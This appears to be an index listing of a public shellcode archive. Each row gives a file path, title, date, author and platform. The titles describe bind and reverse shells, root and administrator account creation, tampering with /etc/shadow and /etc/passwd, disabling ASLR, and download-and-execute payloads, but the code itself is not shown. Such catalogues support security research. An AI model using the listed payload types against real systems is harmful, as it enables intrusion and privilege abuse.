207 13449 shellcodes/linux_x86/13449.c Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes) Linux/x86 - Bind TCP (5074/TCP) Shell + fork() Shellcode (130 bytes) 2004-09-12 Matias Sedalo shellcode linux_x86
208 13450 shellcodes/linux_x86/13450.c Linux/x86 - Add Root User (t00r) Shellcode (82 bytes) 2004-09-12 Matias Sedalo shellcode linux_x86
209 13451 shellcodes/linux_x86/13451.c Linux/x86 - Add Root User Shellcode (104 bytes) 2004-09-12 Matt Conover shellcode linux_x86
210 13452 shellcodes/linux_x86/13452.c Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes) 2004-09-12 dev0id shellcode linux_x86
217 13460 shellcodes/linux_x86/13460.c Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes) 2000-08-08 anonymous shellcode linux_x86
218 13461 shellcodes/linux_x86/13461.c Linux/x86 - Add Root User (z) Shellcode (70 bytes) 2000-08-07 anonymous shellcode linux_x86
219 13462 shellcodes/linux_x86/13462.c Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes) 2000-08-07 anonymous shellcode linux_x86
220 13463 shellcodes/linux_x86-64/13463.c Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes) Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes) 2009-05-18 evil.xi4oyu shellcode linux_x86-64
221 13464 shellcodes/linux_x86-64/13464.s Linux/x86-64 - execve /bin/sh Shellcode (33 bytes) 2006-11-02 hophet shellcode linux_x86-64
222 13465 shellcodes/multiple/13465.c Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes) 2005-11-15 Charles Stevenson shellcode multiple
223 13466 shellcodes/multiple/13466.c OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes) 2005-11-13 nemo shellcode multiple
225 13468 shellcodes/multiple/13468.c Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes) 2004-09-12 dymitri shellcode multiple
226 13469 shellcodes/multiple/13469.c BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes) 2004-09-12 dymitri shellcode multiple
227 13470 shellcodes/netbsd_x86/13470.c NetBSD/x86 - Kill All Processes Shellcode (23 bytes) 2009-06-18 anonymous shellcode netbsd_x86
228 13471 shellcodes/netbsd_x86/13471.c NetBSD/x86 - Reverse TCP Shell (6666/TCP) Shellcode (83 bytes) NetBSD/x86 - Reverse TCP (6666/TCP) Shell Shellcode (83 bytes) 2005-11-30 p. minervini shellcode netbsd_x86
229 13472 shellcodes/netbsd_x86/13472.c NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes) NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (29 bytes) 2005-11-30 p. minervini shellcode netbsd_x86
230 13473 shellcodes/netbsd_x86/13473.c NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes) NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (30 bytes) 2005-11-30 p. minervini shellcode netbsd_x86
231 13474 shellcodes/netbsd_x86/13474.txt NetBSD/x86 - execve /bin/sh Shellcode (68 bytes) 2004-09-26 humble shellcode netbsd_x86
232 13475 shellcodes/openbsd_x86/13475.c OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes) 2006-05-01 hophet shellcode openbsd_x86
233 13476 shellcodes/openbsd_x86/13476.c OpenBSD/x86 - Bind TCP Shell (6969/TCP) Shellcode (148 bytes) OpenBSD/x86 - Bind TCP (6969/TCP) Shell Shellcode (148 bytes) 2004-09-26 Sinan Eren shellcode openbsd_x86
234 13477 shellcodes/openbsd_x86/13477.c OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes) 2004-09-26 anonymous shellcode openbsd_x86
235 13478 shellcodes/osx_ppc/13478.c OSX/PPC - sync() + reboot() Shellcode (32 bytes) 2006-05-01 hophet shellcode osx_ppc
236 13479 shellcodes/osx_ppc/13479.c OSX/PPC - execve(/bin/sh) + exit() Shellcode (72 bytes) 2006-05-01 hophet shellcode osx_ppc
245 13488 shellcodes/sco_x86/13488.c SCO/x86 - execve(_/bin/sh__ ..._ NULL) Shellcode (43 bytes) 2005-11-30 p. minervini shellcode sco_x86
246 13489 shellcodes/solaris_sparc/13489.c Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes) 2006-11-21 xort shellcode solaris_sparc
247 13490 shellcodes/solaris_sparc/13490.c Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes) 2006-10-21 bunker shellcode solaris_sparc
248 13491 shellcodes/generator/13491.c Solaris/SPARC - Reverse TCP Shell (44434/TCP) XNOR Encoded Shellcode (600 bytes) (Generator) Solaris/SPARC - Reverse TCP (44434/TCP) Shell + XNOR Encoded Shellcode (600 bytes) (Generator) 2006-07-21 xort shellcode generator
249 13492 shellcodes/solaris_sparc/13492.c Solaris/SPARC - setreuid + execve Shellcode (56 bytes) 2005-11-20 lhall shellcode solaris_sparc
250 13493 shellcodes/solaris_sparc/13493.c Solaris/SPARC - Bind TCP Shell (6666/TCP) Shellcode (240 bytes) Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes) 2005-11-20 lhall shellcode solaris_sparc
251 13494 shellcodes/solaris_sparc/13494.txt Solaris/SPARC - execve /bin/sh Shellcode (52 bytes) 2004-09-26 LSD-PLaNET shellcode solaris_sparc
252 13495 shellcodes/solaris_sparc/13495.c Solaris/SPARC - Bind TCP /bin/sh Shell (6789/TCP) Shellcode (228 bytes) Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes) 2004-09-26 Claes Nyberg shellcode solaris_sparc
253 13496 shellcodes/solaris_sparc/13496.c Solaris/SPARC - Reverse TCP /bin/sh Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes) Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes) 2004-09-26 Claes Nyberg shellcode solaris_sparc
254 13497 shellcodes/solaris_sparc/13497.txt Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes) 2000-11-19 dopesquad.net shellcode solaris_sparc
255 13498 shellcodes/generator/13498.php Solaris/x86 - Bind TCP Shell Shellcode (Generator) 2009-06-16 Jonathan Salwan shellcode generator
256 13499 shellcodes/solaris_x86/13499.c Solaris/x86 - setuid(0) + execve(//bin/sh) + exit(0) Null-Free Shellcode (39 bytes) 2008-12-02 sm4x shellcode solaris_x86
258 13501 shellcodes/solaris_x86/13501.txt Solaris/x86 - execve /bin/sh ToUpper Encoded Shellcode (84 bytes) 2004-09-26 anonymous shellcode solaris_x86
259 13502 shellcodes/solaris_x86/13502.txt Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes) 2004-09-26 anonymous shellcode solaris_x86
260 13503 shellcodes/unixware/13503.txt UnixWare - execve /bin/sh Shellcode (95 bytes) 2004-09-26 K2 shellcode unixware
261 13504 shellcodes/windows_x86/13504.asm Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode 2009-07-27 Skylined shellcode windows_x86
262 13505 shellcodes/windows_x86/13505.c Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes) 2009-07-17 Stack shellcode windows_x86
263 13507 shellcodes/windows_x86/13507.txt Windows x86 - Egg Omelet SEH Shellcode 2009-03-16 Skylined shellcode windows_x86
264 13508 shellcodes/windows_x86/13508.asm Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes) 2009-02-27 DATA_SNIPER shellcode windows_x86
281 13525 shellcodes/windows_x86/13525.c Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes) 2005-07-26 loco shellcode windows_x86
282 13526 shellcodes/windows_x86/13526.c Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes) 2005-01-26 twoci shellcode windows_x86
283 13527 shellcodes/windows_x86/13527.c Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes) 2005-01-09 oc192 shellcode windows_x86
284 13528 shellcodes/generator/13528.c Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53/TCP) Shellcode (275 bytes) (Generator) Windows XP/2000/2003 - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator) 2004-10-25 lion shellcode generator
285 13529 shellcodes/windows_x86/13529.c Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes) 2004-10-25 lion shellcode windows_x86
286 13530 shellcodes/windows_x86/13530.asm Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode 2004-09-26 Peter Winter-Smith shellcode windows_x86
287 13531 shellcodes/windows_x86/13531.c Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes) Windows XP SP1 - Bind TCP (58821/TCP) Shell Shellcode (116 bytes) 2004-09-26 silicon shellcode windows_x86
288 13532 shellcodes/windows_x86/13532.asm Windows - DCOM RPC2 Universal Shellcode 2003-10-09 anonymous shellcode windows_x86
289 13533 shellcodes/windows_x86-64/13533.asm Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes) 2006-08-07 Weiss shellcode windows_x86-64
290 13548 shellcodes/linux_x86/13548.asm Linux/x86 - Kill All Processes Shellcode (9 bytes) 2010-01-14 root@thegibson shellcode linux_x86
297 13565 shellcodes/windows_x86/13565.asm Windows XP SP3 x86 - ShellExecuteA Shellcode 2009-12-19 sinn3r shellcode windows_x86
298 13566 shellcodes/linux_x86/13566.c Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode 2009-12-19 mr_me shellcode linux_x86
299 13569 shellcodes/windows_x86/13569.asm Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode 2009-12-24 sinn3r shellcode windows_x86
300 13570 shellcodes/freebsd_x86/13570.c FreeBSD/x86 - Bind TCP /bin/sh Shell (1337/TCP) Shellcode (167 bytes) FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes) 2009-12-24 sbz shellcode freebsd_x86
301 13571 shellcodes/windows_x86/13571.c Windows XP SP2 x86 - calc.exe Shellcode (45 bytes) 2009-12-24 Stack shellcode windows_x86
302 13572 shellcodes/linux_x86/13572.c Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes) 2009-12-24 sandman shellcode linux_x86
303 13574 shellcodes/windows_x86/13574.c Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes) 2009-12-28 AnTi SeCuRe shellcode windows_x86
329 13647 shellcodes/windows_x86/13647.txt Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes) 2010-03-24 lord Kelvin shellcode windows_x86
330 13648 shellcodes/windows_x86/13648.rb Windows x86 - MessageBox Shellcode (Metasploit) 2010-03-24 corelanc0d3r shellcode windows_x86
331 13649 shellcodes/windows/13649.txt Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode 2010-03-27 Alexey Sintsov shellcode windows
332 13661 shellcodes/linux_x86/13661.txt Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode 2010-04-02 anonymous shellcode linux_x86
333 13669 shellcodes/linux_x86/13669.c Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes) 2010-04-14 Magnefikko shellcode linux_x86
334 13670 shellcodes/linux_x86-64/13670.c Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2) 2010-04-14 Magnefikko shellcode linux_x86-64
335 13671 shellcodes/linux_x86/13671.c Linux/x86 - DoS Badger Game Shellcode (6 bytes) 2010-04-14 Magnefikko shellcode linux_x86
370 13733 shellcodes/solaris/13733.c Solaris/x86 - SystemV killall Command Shellcode (39 bytes) 2010-06-03 Jonathan Salwan shellcode solaris
371 13742 shellcodes/linux_x86/13742.c Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes) 2010-06-06 gunslinger_ shellcode linux_x86
372 13743 shellcodes/linux_x86/13743.c Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes) 2010-06-06 gunslinger_ shellcode linux_x86
373 14334 shellcodes/linux_x86/14334.c Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes) Linux/x86 - Reverse TCP (8080/TCP) Netcat Shell Shellcode (76 bytes) 2010-07-11 blake shellcode linux_x86
374 13828 shellcodes/windows/13828.c Windows - MessageBoxA Shellcode (238 bytes) 2010-06-11 RubberDuck shellcode windows
375 13875 shellcodes/solaris_x86/13875.c Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes) 2010-06-14 Jonathan Salwan shellcode solaris_x86
376 13908 shellcodes/linux_x86-64/13908.c Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes) 2010-06-17 Jonathan Salwan shellcode linux_x86-64
377 13910 shellcodes/linux_x86/13910.c Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes) Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes) 2010-06-17 gunslinger_ shellcode linux_x86
378 13915 shellcodes/linux_x86-64/13915.txt Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes) 2010-06-17 Jonathan Salwan shellcode linux_x86-64
379 13943 shellcodes/linux_x86-64/13943.c Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes) 2010-06-20 Jonathan Salwan shellcode linux_x86-64
380 14014 shellcodes/windows_x86/14014.pl Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) 2010-06-24 d0lc3 shellcode windows_x86
386 14122 shellcodes/arm/14122.txt Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes) 2010-06-29 Florian Gaultier shellcode arm
387 14139 shellcodes/arm/14139.c Linux/ARM - Disable ASLR Security Shellcode (102 bytes) 2010-06-30 Jonathan Salwan shellcode arm
388 14190 shellcodes/arm/14190.c Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) XOR 88 Encoded Polymorphic Shellcode (78 bytes) 2010-07-03 Jonathan Salwan shellcode arm
389 14216 shellcodes/linux_x86/14216.c Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes) Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes) 2010-07-05 Magnefikko shellcode linux_x86
390 14218 shellcodes/linux/14218.c Linux - Write SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes) 2010-07-05 gunslinger_ shellcode linux
391 14219 shellcodes/linux/14219.c Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes) 2010-07-05 gunslinger_ shellcode linux
392 14221 shellcodes/windows/14221.html Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode 2010-07-05 Alexey Sintsov shellcode windows
393 14234 shellcodes/linux/14234.c Linux - Bind TCP Shell (6778/TCP) XOR Encoded Polymorphic Shellcode (125 bytes) Linux - Bind TCP (6778/TCP) Shell + XOR Encoded Polymorphic Shellcode (125 bytes) 2010-07-05 gunslinger_ shellcode linux
394 14235 shellcodes/linux/14235.c Linux - Bind Netcat Shell (31337/TCP) Polymorphic Shellcode (91 bytes) Linux - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes) 2010-07-05 gunslinger_ shellcode linux
395 14261 shellcodes/generator/14261.c Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator) 2010-07-07 Jonathan Salwan shellcode generator
396 14276 shellcodes/linux/14276.c Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes) 2010-07-08 gunslinger_ shellcode linux
397 14288 shellcodes/windows_x86/14288.asm Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes) 2010-07-09 Brett Gervasoni shellcode windows_x86
398 14305 shellcodes/linux_x86-64/14305.c Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes) 2010-07-09 10n1z3d shellcode linux_x86-64
399 14332 shellcodes/linux_x86/14332.c Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes) Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes) 2010-07-11 blake shellcode linux_x86
400 14691 shellcodes/linux_x86/14691.c Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes) 2010-08-19 Aodrulez shellcode linux_x86
401 14697 shellcodes/windows/14697.c Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes) 2010-08-20 Glafkos Charalambous shellcode windows
402 14795 shellcodes/bsd_x86/14795.c BSD/x86 - Bind TCP Shell (2525/TCP) Shellcode (167 bytes) BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes) 2010-08-25 beosroot shellcode bsd_x86
403 14873 shellcodes/windows_x86/14873.asm Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes) 2010-09-02 dijital1 shellcode windows_x86
404 14907 shellcodes/arm/14907.c Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes) 2010-09-05 Jonathan Salwan shellcode arm
405 15063 shellcodes/windows_x86/15063.c Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes) 2010-09-20 ZoRLu shellcode windows_x86
407 15136 shellcodes/windows/15136.cpp Windows Mobile 6.5 TR - Phone Call Shellcode 2010-09-27 Celil Ünüver shellcode windows
408 15202 shellcodes/windows_x86/15202.c Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes) 2010-10-04 Anastasios Monachos shellcode windows_x86
409 15203 shellcodes/windows_x86/15203.c Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes) 2010-10-04 Anastasios Monachos shellcode windows_x86
410 15314 shellcodes/arm/15314.asm Linux/ARM - Bind TCP Shell (0x1337/TCP) Shellcode Linux/ARM - Bind TCP (0x1337/TCP) Shell Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
411 15315 shellcodes/arm/15315.asm Linux/ARM - Bind UDP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode Linux/ARM - Bind UDP (68/UDP) Listener + Reverse TCP (192.168.0.1:67/TCP) Shell Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
412 15316 shellcodes/arm/15316.asm Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
413 15317 shellcodes/arm/15317.asm Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode 2010-10-26 Daniel Godas-Lopez shellcode arm
414 15616 shellcodes/arm/15616.c Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes) 2010-11-25 Jonathan Salwan shellcode arm
415 15618 shellcodes/osx/15618.c OSX/Intel x86-64 - setuid shell Shellcode (51 bytes) 2010-11-25 Dustin Schultz shellcode osx
416 15712 shellcodes/generator/15712.rb ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator) 2010-12-09 Jonathan Salwan shellcode generator
417 15879 shellcodes/windows_x86/15879.txt Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode 2010-12-31 Skylined shellcode windows_x86
418 16025 shellcodes/generator/16025.c FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator) FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator) 2011-01-21 Tosh shellcode generator
419 16026 shellcodes/freebsd_x86/16026.c FreeBSD/x86 - Bind TCP /bin/sh Shell (31337/TCP) + Fork Shellcode (111 bytes) FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + Fork Shellcode (111 bytes) 2011-01-21 Tosh shellcode freebsd_x86
420 16283 shellcodes/windows_x86/16283.txt Windows x86 - Eggsearch Shellcode (33 bytes) 2011-03-05 oxff shellcode windows_x86
421 17432 shellcodes/superh_sh4/17432.c Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes) 2011-06-22 Jonathan Salwan shellcode superh_sh4
422 17194 shellcodes/linux_x86/17194.txt Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes) Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic XOR Encoded Shellcode (69/93 bytes) 2011-04-21 Jonathan Salwan shellcode linux_x86
423 17224 shellcodes/osx/17224.s OSX/Intel x86-64 - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes) OSX/Intel x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) 2011-04-29 hammackj shellcode osx
424 17323 shellcodes/windows/17323.c Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes) 2011-05-25 RubberDuck shellcode windows
425 20195 shellcodes/linux_x86/20195.c Linux/x86 - Disable ASLR Security Shellcode (83 bytes) 2012-08-02 Jean Pascal Pereira shellcode linux_x86
426 17326 shellcodes/generator/17326.rb Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit) 2011-05-26 Alexey Sintsov shellcode generator
427 17371 shellcodes/linux_x86/17371.txt Linux/x86 - Reverse TCP SSL Shell (localhost:8080/TCP) Shellcode (422 bytes) Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes) 2011-06-08 Jonathan Salwan shellcode linux_x86
428 17439 shellcodes/superh_sh4/17439.c Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes) 2011-06-23 Jonathan Salwan shellcode superh_sh4
429 17545 shellcodes/windows_x86/17545.txt Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes) 2011-07-18 KaHPeSeSe shellcode windows_x86
430 17559 shellcodes/linux_x86/17559.c Linux/x86 - Egghunter Null-Free Shellcode (29 bytes) 2011-07-21 Ali Raheem shellcode linux_x86
435 18162 shellcodes/linux_mips/18162.c Linux/MIPS - execve /bin/sh Shellcode (48 bytes) 2011-11-27 rigan shellcode linux_mips
436 18163 shellcodes/linux_mips/18163.c Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes) 2011-11-27 rigan shellcode linux_mips
437 18197 shellcodes/linux_x86-64/18197.c Linux/x86-64 - execve /bin/sh Shellcode (52 bytes) 2011-12-03 X-h4ck shellcode linux_x86-64
438 18226 shellcodes/linux_mips/18226.c Linux/MIPS - Reverse TCP Shell (0x7a69/TCP) Shellcode (168 bytes) Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes) 2011-12-10 rigan shellcode linux_mips
439 18227 shellcodes/linux_mips/18227.c Linux/MIPS - reboot() Shellcode (32 bytes) 2011-12-10 rigan shellcode linux_mips
440 18294 shellcodes/linux_x86/18294.c Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode 2011-12-31 pentesters.ir shellcode linux_x86
441 18379 shellcodes/linux_x86/18379.c Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes) 2012-01-17 rigan shellcode linux_x86
442 18585 shellcodes/linux_x86-64/18585.s Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes) 2012-03-12 0_o shellcode linux_x86-64
443 18885 shellcodes/linux_x86/18885.c Linux/x86 - execve /bin/dash Shellcode (42 bytes) 2012-05-16 X-h4ck shellcode linux_x86
444 20196 shellcodes/linux_x86/20196.c Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes) 2012-08-02 Jean Pascal Pereira shellcode linux_x86
445 21252 shellcodes/arm/21252.asm Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes) Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes) 2012-09-11 midnitesnake shellcode arm
446 21253 shellcodes/arm/21253.asm Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes) 2012-09-11 midnitesnake shellcode arm
447 21254 shellcodes/arm/21254.asm Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes) 2012-09-11 midnitesnake shellcode arm
448 40363 shellcodes/windows_x86/40363.c Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes) Windows x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes) 2016-09-13 Roziul Hasan Khan Shifat shellcode windows_x86
449 22489 shellcodes/windows/22489.cpp Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes) 2012-11-05 b33f shellcode windows
450 40890 shellcodes/windows_x86-64/40890.c Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes) Windows x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes) 2016-12-08 Roziul Hasan Khan Shifat shellcode windows_x86-64
451 23622 shellcodes/linux_x86/23622.c Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes) 2012-12-24 Hamza Megahed shellcode linux_x86
452 24318 shellcodes/windows/24318.c Windows (2000/XP/7 x64/x86) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode 2013-01-24 RubberDuck shellcode windows
453 25497 shellcodes/linux_x86/25497.c Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes) Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes) 2013-05-17 Russell Willis shellcode linux_x86
454 40387 shellcodes/hardware/40387.nasm Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes) 2016-09-16 Sean Dillon shellcode hardware
455 27132 shellcodes/linux_mips/27132.txt Linux/MIPS (Little Endian) - system() Shellcode (80 bytes) 2013-07-27 Jacob Holcomb shellcode linux_mips
456 27180 shellcodes/arm/27180.asm Windows RT ARM - Bind TCP Shell (4444/TCP) Shellcode Windows RT ARM - Bind TCP (4444/TCP) Shell Shellcode 2013-07-28 Matthew Graeber shellcode arm
457 40827 shellcodes/linux_x86/40827.c Linux/x86 - Egghunter Shellcode (31 bytes) 2016-11-25 Filippo Bersani shellcode linux_x86
458 28474 shellcodes/linux_x86/28474.c Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP (192.168.122.1:43981/TCP) Shell (/bin/sh) Shellcode 2013-09-23 Ryan Fenno shellcode linux_x86
459 40334 shellcodes/windows_x86/40334.c Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes) Windows x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes) 2016-09-05 Roziul Hasan Khan Shifat shellcode windows_x86
460 28996 shellcodes/windows/28996.c Windows - MessageBox Null-Free Shellcode (113 bytes) 2013-10-16 Giuseppe D'Amore shellcode windows
461 29436 shellcodes/linux_mips/29436.asm Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes) Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes) 2013-11-04 Jacob Holcomb shellcode linux_mips
462 40352 shellcodes/windows_x86/40352.c Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 bytes) Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes) 2016-09-08 Roziul Hasan Khan Shifat shellcode windows_x86
463 33836 shellcodes/windows/33836.txt Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes) 2014-06-22 Giuseppe D'Amore shellcode windows
464 34060 shellcodes/linux_x86/34060.c Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes) 2014-07-14 ZadYree shellcode linux_x86
465 34262 shellcodes/linux_x86/34262.c Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes) 2014-08-04 Ali Razmjoo shellcode linux_x86
